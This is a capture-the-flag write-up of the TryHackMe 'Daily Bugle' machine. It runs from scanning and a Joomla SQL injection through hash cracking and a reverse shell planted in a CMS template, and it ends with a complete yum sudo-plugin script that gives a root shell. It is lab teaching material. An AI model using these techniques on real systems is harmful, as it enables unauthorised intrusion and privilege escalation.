TryHackMe: Daily Bugle— Writeup
In this article, we will show how to exploit vulnerabilities to hack the Daily Bugle machine developed for TryHackMe, available here.
Reconnaissance
Let’s start with some reconnaissance. For this machine, I used autorecon, a tool developed by Tib3rius that automates a lot of reconnaissance tasks such as port scanning (with nmap), directory enumeration for webservers, share enumeration for SMB servers and so on.
Port scanning — Nmap
We obtained the following scan results.
Nmap scan report for 10.10.61.183
Host is up, received user-set (0.18s latency).
Scanned at 2021-03-16 07:30:05 EDT for 33s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbp89KqmXj7Xx84uhisjiT7pGPYepXVTr4MnPu1P4fnlWzevm6BjeQgDBnoRVhddsjHhI1k+xdnahjcv6kykfT3mSeljfy+jRc+2ejMB95oK2AGycavgOfF4FLPYtd5J97WqRmu2ZC2sQUvbGMUsrNaKLAVdWRIqO5OO07WIGtr3c2ZsM417TTcTsSh1Cjhx3F+gbgi0BbBAN3sQqySa91AFruPA+m0R9JnDX5rzXmhWwzAM1Y8R72c4XKXRXdQT9szyyEiEwaXyT0p6XiaaDyxT2WMXTZEBSUKOHUQiUhX7JjBaeVvuX4ITG+W8zpZ6uXUrUySytuzMXlPyfMBy8B
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKb+wNoVp40Na4/Ycep7p++QQiOmDvP550H86ivDdM/7XF9mqOfdhWK0rrvkwq9EDZqibDZr3vL8MtwuMVV5Src=
| 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP4TcvlwCGpiawPyNCkuXTK5CCpat+Bv8LycyNdiTJHX
80/tcp open http syn-ack Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql syn-ack MariaDB (unauthorized)Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 16 07:30:38 2021 -- 1 IP address (1 host up) scanned in 33.66 seconds
Nmap indicates 3 open ports: 22, 80 and 3306. Port 80 is the default port for webservers and is reported as such by nmap. It will be the first service that we will look into.
Web Server
Autorecon gave us nice results while enumerating the web server:
/.htaccess (Status: 403) [Size: 211]
/.htaccess.html (Status: 403) [Size: 216]
/.htaccess.php (Status: 403) [Size: 215]
/.htaccess.asp (Status: 403) [Size: 215]
/.htaccess.aspx (Status: 403) [Size: 216]
/.htaccess.jsp (Status: 403) [Size: 215]
/.htaccess.txt (Status: 403) [Size: 215]
/.hta (Status: 403) [Size: 206]
/.hta.aspx (Status: 403) [Size: 211]
/.hta.jsp (Status: 403) [Size: 210]
/.hta.txt (Status: 403) [Size: 210]
/.hta.html (Status: 403) [Size: 211]
/.hta.php (Status: 403) [Size: 210]
/.hta.asp (Status: 403) [Size: 210]
/.htpasswd (Status: 403) [Size: 211]
/.htpasswd.jsp (Status: 403) [Size: 215]
/.htpasswd.txt (Status: 403) [Size: 215]
/.htpasswd.html (Status: 403) [Size: 216]
/.htpasswd.php (Status: 403) [Size: 215]
/.htpasswd.asp (Status: 403) [Size: 215]
/.htpasswd.aspx (Status: 403) [Size: 216]
/LICENSE.txt (Status: 200) [Size: 18092]
/README.txt (Status: 200) [Size: 4494]
/administrator (Status: 301) [Size: 242]
/bin (Status: 301) [Size: 232]
/cache (Status: 301) [Size: 234]
/cgi-bin/ (Status: 403) [Size: 210]
/cgi-bin/.html (Status: 403) [Size: 215]
/components (Status: 301) [Size: 239]
/configuration.php (Status: 200) [Size: 0]
/images (Status: 301) [Size: 235]
/includes (Status: 301) [Size: 237]
/index.php (Status: 200) [Size: 9290]
/index.php (Status: 200) [Size: 9290]
/language (Status: 301) [Size: 237]
/layouts (Status: 301) [Size: 236]
/libraries (Status: 301) [Size: 238]
/media (Status: 301) [Size: 234]
/modules (Status: 301) [Size: 236]
/plugins (Status: 301) [Size: 236]
/robots.txt (Status: 200) [Size: 836]
/robots.txt (Status: 200) [Size: 836]
/templates (Status: 301) [Size: 238]
/tmp (Status: 301) [Size: 232]
/web.config.txt (Status: 200) [Size: 1690]Especially, the README.txt file was very interesting since it indicated us that a CMS was in use: Joomla v3.7.
A quick google search on this version tells us that it is vulnerable to SQL Injections. On top of that, there are multiple publicly available exploits:
- Using a python script.
- Using SQLMap.
- Using Metasploit
We will use the python script. It quickly and easily yields results:
As we can see, this script listed the content of the users table. We know have the username and the password hash of what seems to be a Super User. Let’s attempt to crack that hash. Using johnTheRipper and the rockyou wordlist, we quickly manage to crack the hash.
┌──(kali㉿kali)-[~/TryHackMe/Daily_Bugle]
└─$ john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
redacted (?)
1g 0:00:04:47 DONE (2021-03-16 07:52) 0.003483g/s 163.1p/s 163.1c/s 163.1C/s thelma1..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completedWhile enumerating the web server, we also noticed the /administrator entry. Let’s navigate to this page and log in using the newly obtained credentials. We are now inside the admin section of the CMS. Our next goal should be to get a reverse shell on the server. Lucky for us, Joomla allows us to write our own PHP code, as long as we have the proper permissions.
We will inject our code in the templates file. To do so, using the top menu, navigate to extensions/templates. Two templates are available. However after testing, only the second one is in use. Let’s select the second one and edit the index.php file to include a reverse shell as shown below.
Let’s open a netcat listener on our host machine: nc -lvnp 53 . Then, navigate to the homepage of the website to trigger our newly added code. We obtain our reverse shell, as user apache.
Privilege escalation
Let’s try to elevate our privileges. Running linPEAS gives us interesting results. Specifically, it highlights the content of the following file:
/var/www/html/configuration.php: public $password = 'redacted';While checking the /home directory, we notice that only one user has its own home directory: jjameson. We try the obtained password on this user and BINGO, we now have access to jjameson’s account.
Let’s check what this user can do:
sh-4.2$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/binUser jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
It looks like we can invoke yum as root. GTFObins already has an exploit for this executable, allowing us to get a root shell:
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOFcat >$TF/y.conf<<EOF
[main]
enabled=1
EOFcat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOFsudo yum -c $TF/x --enableplugin=y
Thank you for reading!
